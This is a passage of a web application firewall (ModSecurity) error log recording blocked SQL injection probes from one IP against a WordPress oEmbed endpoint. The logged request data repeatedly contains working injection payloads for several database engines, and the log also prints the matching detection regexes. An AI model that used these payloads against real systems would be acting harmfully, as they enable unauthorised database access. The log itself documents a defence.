"OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26_3xeJlWfH1pdny5XbQAAAMw"] [Thu Aug 15 03:23:27.546019 2024] [:error] [pid 31337:tid 139653931849472] [client 141.98.81.52:57046] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x7162626271 found within ARGS:format: xml AND (SELECT 6302 FROM(SELECT COUNT(*),CONCAT(0x7162626271,(SELECT (ELT(6302=6302,1))),0x7162707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- stzJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26_-wCyyCVFXh0DMS2kgAAAIg"] [Thu Aug 15 03:23:28.169708 2024] [:error] [pid 31519:tid 139654024500992] [client 141.98.81.52:57048] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml) AND 6824=CAST((CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (6824=6824) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)) AS NUMERIC) AND (3897=3897"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27AHxeJlWfH1pdny5XbgAAAMU"] [Thu Aug 15 03:23:28.504454 2024] [:error] [pid 31335:tid 139653931849472] [client 141.98.81.52:57050] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml AND 6824=CAST((CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (6824=6824) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)) AS NUMERIC)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27AG0MD5oChETZltkVXgAAAAg"] [Thu Aug 15 03:23:29.010559 2024] [:error] [pid 31336:tid 139653898278656] [client 141.98.81.52:57052] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml') AND 6824=CAST((CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (6824=6824) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)) AS NUMERIC) AND ('YbYX'='YbYX"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27AUPAyXqJhbW53WyPWwAAAEw"] [Thu Aug 15 03:23:29.426630 2024] [:error] [pid 31519:tid 139653931849472] [client 141.98.81.52:57054] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml' AND 6824=CAST((CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (6824=6824) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)) AS NUMERIC) AND 'GWIa'='GWIa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27AXxeJlWfH1pdny5XbwAAAMg"] [Thu Aug 15 03:23:29.878872 2024] [:error] [pid 31335:tid 139653847922432] [client 141.98.81.52:57056] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml%' AND 6824=CAST((CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (6824=6824) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)) AS NUMERIC) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27AW0MD5oChETZltkVXwAAABI"] [Thu Aug 15 03:23:30.274241 2024] [:error] [pid 31336:tid 139653797566208] [client 141.98.81.52:57058] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml AND 6824=CAST((CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (6824=6824) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)) AS NUMERIC)-- VhTL"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27AkPAyXqJhbW53WyPXAAAAFg"] [Thu Aug 15 03:23:30.813668 2024] [:error] [pid 31335:tid 139653856315136] [client 141.98.81.52:57060] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:format: xml) AND 5172=CONVERT(INT,(SELECT CHAR(113) CHAR(98) CHAR(98) CHAR(98) CHAR(113) (SELECT (CASE WHEN (5172=5172) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(98) CHAR(112) CHAR(120) CHAR(113))) AND (3637=3637"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27Am0MD5oChETZltkVYAAAABE"] [Thu Aug 15 03:23:31.237204 2024] [:error] [pid 31335:tid 139653898278656] [client 141.98.81.52:57062] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:format: xml AND 5172=CONVERT(INT,(SELECT CHAR(113) CHAR(98) CHAR(98) CHAR(98) CHAR(113) (SELECT (CASE WHEN (5172=5172) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(98) CHAR(112) CHAR(120) CHAR(113)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27A20MD5oChETZltkVYQAAAAw"] [Thu Aug 15 03:23:31.603508 2024] [:error] [pid 31335:tid 139653915064064] [client 141.98.81.52:57064] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:format: xml') AND 5172=CONVERT(INT,(SELECT CHAR(113) CHAR(98) CHAR(98) CHAR(98) CHAR(113) (SELECT (CASE WHEN (5172=5172) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(98) CHAR(112) CHAR(120) CHAR(113))) AND ('BaOo'='BaOo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27A20MD5oChETZltkVYgAAAAo"] [Thu Aug 15 03:23:32.114860 2024] [:error] [pid 31335:tid 139653940242176] [client 141.98.81.52:57066] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:format: xml' AND 5172=CONVERT(INT,(SELECT CHAR(113) CHAR(98) CHAR(98) CHAR(98) CHAR(113) (SELECT (CASE WHEN (5172=5172) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(98) CHAR(112) CHAR(120) CHAR(113))) AND 'tpsz'='tpsz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27BG0MD5oChETZltkVYwAAAAc"] [Thu Aug 15 03:23:32.538478 2024] [:error] [pid 31519:tid 139653923456768] [client 141.98.81.52:57068] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:format: xml%' AND 5172=CONVERT(INT,(SELECT CHAR(113) CHAR(98) CHAR(98) CHAR(98) CHAR(113) (SELECT (CASE WHEN (5172=5172) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(98) CHAR(112) CHAR(120) CHAR(113))) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27BHxeJlWfH1pdny5XcAAAAMk"] [Thu Aug 15 03:23:32.931328 2024] [:error] [pid 31519:tid 139653822744320] [client 141.98.81.52:57070] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: CONVERT( found within ARGS:format: xml AND 5172=CONVERT(INT,(SELECT CHAR(113) CHAR(98) CHAR(98) CHAR(98) CHAR(113) (SELECT (CASE WHEN (5172=5172) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(98) CHAR(112) CHAR(120) CHAR(113)))-- ifjl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27BHxeJlWfH1pdny5XcQAAANU"] [Thu Aug 15 03:23:33.462036 2024] [:error] [pid 31519:tid 139653814351616] [client 141.98.81.52:57072] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml) AND 9780=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9780=9780) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND (4662=4662"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27BXxeJlWfH1pdny5XcgAAANY"] [Thu Aug 15 03:23:33.758963 2024] [:error] [pid 31519:tid 139653889885952] [client 141.98.81.52:57074] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml AND 9780=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9780=9780) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27BXxeJlWfH1pdny5XcwAAAM0"] [Thu Aug 15 03:23:34.186860 2024] [:error] [pid 31519:tid 139654049679104] [client 141.98.81.52:57076] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml') AND 9780=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9780=9780) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND ('MWKG'='MWKG"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27BnxeJlWfH1pdny5XdAAAAMI"] [Thu Aug 15 03:23:34.617278 2024] [:error] [pid 31519:tid 139653940242176] [client 141.98.81.52:57078] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml' AND 9780=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9780=9780) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'kzcr'='kzcr"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27BnxeJlWfH1pdny5XdQAAAMc"] [Thu Aug 15 03:23:35.017768 2024] [:error] [pid 31337:tid 139653814351616] [client 141.98.81.52:57080] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml%' AND 9780=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(98)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9780=9780) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(112)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27B-wCyyCVFXh0DMS2kwAAAJY"] [Thu Aug 15 03:23:35.439249 2024] [:error] [pid 31335:tid 139654041286400] [client 141.98.81.52:57084] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml AND 9780=(SELECT 